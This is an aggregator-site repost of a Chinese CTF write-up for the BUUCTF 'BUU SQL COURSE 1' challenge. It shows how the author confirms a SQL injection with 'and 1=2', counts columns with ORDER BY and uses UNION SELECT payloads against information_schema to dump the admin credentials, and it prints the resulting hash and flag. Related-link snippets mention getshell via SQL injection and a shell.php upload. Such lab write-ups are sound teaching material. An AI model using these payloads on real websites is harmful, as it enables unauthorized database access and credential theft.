iis服务器助手广告广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >BUU SQL COURSE 1 1(SQL注入)
  • 224

0
分享到

BUU SQL COURSE 1 1(SQL注入)

sqlphpweb渗透CTF数据库 2023-09-11 08:09:04 224人浏览 独家记忆
摘要

题目链接 https://buuoj.cn/challenges 思路 我们先看登录界面,然后试一下各种万能密码,发现并没有用 然后我们点开热点中的热点一,我们发现这里有一个PHP的请求,于是我们猜

题目链接

https://buuoj.cn/challenges

思路

我们先看登录界面,然后试一下各种万能密码,发现并没有用

在这里插入图片描述

然后我们点开热点中的热点一,我们发现这里有一个PHP的请求,于是我们猜测是否这里会有sql注入,于是我们开始尝试

在这里插入图片描述
开始测试
Http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=1,发现还是正常的数据
在这里插入图片描述

http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=2

发现此时,数据就不回显了,那么很显然这里存在sql注入

在这里插入图片描述
通过order by 确定数据的条数,我们发现当order by 3 的时候,数据不在回显,而当数字小于等于 2 2 2 的时候会发生回显,于是数据确定为两列

在这里插入图片描述
在这里插入图片描述
接下来就是一个流程了,暴库、暴表、暴字段、爆密码

暴库:(infORMation_schema,ctftraining,Mysql,performance_schema,test,news)?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata暴表:(admin,contents)?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"暴字段:(id,username,passWord)?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"暴密码:(983a3f6bc1f3709f9f8997f887ef9803)?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

于是我们找到了admin的密码:983a3f6bc1f3709f9f8997f887ef9803

登录账号即可获得flag

flag{614439de-3e96-45fc-bc67-10165bc60690}

在这里插入图片描述

来源地址:https://blog.csdn.net/m0_46201544/article/details/127522264

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: BUU SQL COURSE 1 1(SQL注入)

本文链接: http://www.lsjlt.com/news/402859.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • BUU SQL COURSE 1 1(SQL注入)
    题目链接 https://buuoj.cn/challenges 思路 我们先看登录界面,然后试一下各种万能密码,发现并没有用 然后我们点开热点中的热点一,我们发现这里有一个php的请求,于是我们猜...
    99+
    2023-09-11
    sql php web渗透 CTF 数据库
  • BUUCTF--BUU UPLOAD COURSE 1
    BUUCTF–BUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: ...
    99+
    2023-09-22
    php 安全 web安全
  • SQL注入GetShell的方法(1)
    目录 一、注入条件 二、注入相关函数和语句 三、联合写入 四、分隔符写入 五、日志写入 六、堆叠写入 七、--os-shell 一、注入条件 使用sql注入进行文件上传功能获取getshell,它有以下三个条件 最高用户权限 root...
    99+
    2023-09-01
    sql 数据库 mysql
  • SQL中“where 1=1”的用法
    这篇文章给大家分享的是有关SQL中“where 1=1”的用法的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。SQL中where 1=1的用处解释:其实,1=1...
    99+
    2024-04-02
  • Sql-labs靶场(1~28)
    文章目录 简介Less-1 '闭合Less-2 数字型无闭合字符Less-3 ')闭合Less-4 ")闭合Less-5报错注入 '闭合Less-6报错注入"闭合Less-7写马注入Less-...
    99+
    2023-09-18
    sql 数据库 mysql 网络安全
  • 3-1 SQL Server 2005的
      第3章      事务处理,并发控制及数据库优化 l        SQL Server 2005的事务处理 l        SQL Server 2005的并发控制 l        SQL ...
    99+
    2023-01-31
    SQL Server
  • sql语句中where 1=1的作用是什么
    sql语句中where 1=1的作用是什么,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。 在看程序...
    99+
    2024-04-02
  • SQL语句中where 1=1指的是什么意思
    小编给大家分享一下SQL语句中where 1=1指的是什么意思,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!sql语句...
    99+
    2024-04-02
  • 如何进行sql where 1=1的优缺点分析
    如何进行sql where 1=1的优缺点分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。一、不用where 1=1...
    99+
    2024-04-02
  • sql中where1=1是必须的吗
    where 1=1 在 sql 中不是必需的。作为占位符或清除先前条件时可以使用,但不宜使用它进行过滤操作,因为它会强制扫描所有行并降低性能。其他实现相同效果的方法包括:whe...
    99+
    2024-05-02
  • XSS-Lab(XSS注入笔记1-16)
    前言 本篇博客主要是记录笔者完成XSS-Lab步骤以及分析 题目链接:https://buuoj.cn/challenges Github仓库:https://github.com/rebo-rn/x...
    99+
    2023-08-31
    xss php 安全 web安全 ctf
  • php sql注入
    文章目录 一、什么是sql注入二、sql注入处理1、使用内置函数2、使用pdo预处理语句 三、安全注意事项 一、什么是sql注入 在应用程序中,为了和用户交互,允许用户提交输入数...
    99+
    2023-08-30
    sql php mysql php sql 注入 sql 注入
  • SQL语句中Where条件后写上1=1是什么意思
    这篇文章主要讲解了“SQL语句中Where条件后写上1=1是什么意思”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SQL语句中Where...
    99+
    2024-04-02
  • DVWA-----SQL Injection(SQL手工注入)
    目录 一、SQL注入 1.SQL注入原理  2.SQL注入分类 3.SQL注入思路 4.SQL注入绕过方法 二、SQL注入漏洞的分析         1. 定义 2. 原因 3.危害 三、Web 程序三层架构 四、SQL Injection...
    99+
    2023-09-05
    sql 数据库 服务器 web安全 php
  • Mybatis-plus sql注入及防止sql注入详解
    目录一、SQL注入是什么?二、mybatis是如何做到防止sql注入的1. #{} 和 ${} 两者的区别2.PreparedStatement和Statement的区别3.什么是预...
    99+
    2022-11-13
    mybatis-plus sql注入 mybatis-plus防止sql注入
  • sql注入之堆叠注入
    一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行...
    99+
    2023-09-09
    sql mysql php 信息安全 网络安全
  • 简单聊一聊SQL注入及防止SQL注入
    目录SQL注入附防止sql注入的一些建议总结SQL注入 SQL注入是通过操作输入来修改事先定义好的SQL语句,对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入...
    99+
    2024-04-02
  • SQL注入基础
    引言 靓仔们是否经常听到sql注入呢,那么sql注入到底是什么? 引用微软官方的语言来说: SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。 构成...
    99+
    2023-09-18
    数据库 服务器 mysql
  • 从0到1之路 Python执行SQL脚本
    目标:使用python执行sql脚本 设想:从数据库读取数据,和前端进行比对,返回判断结果 ...
    99+
    2023-01-31
    之路 脚本 Python
  • 防止SQL注入
    SQL注入是指攻击者通过在输入的数据中注入恶意的SQL代码,以获取非法访问、窃取敏感信息等操作。以下是一些防止SQL注入的方法: 使用参数化查询:使用参数化查询可以防止SQL注入攻击,参数化查询是指在执行查询时,将参数与查询语句分离,使得...
    99+
    2023-09-10
    sql 数据库 java mysql
软考高级职称资格查询
iis服务器助手广告
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作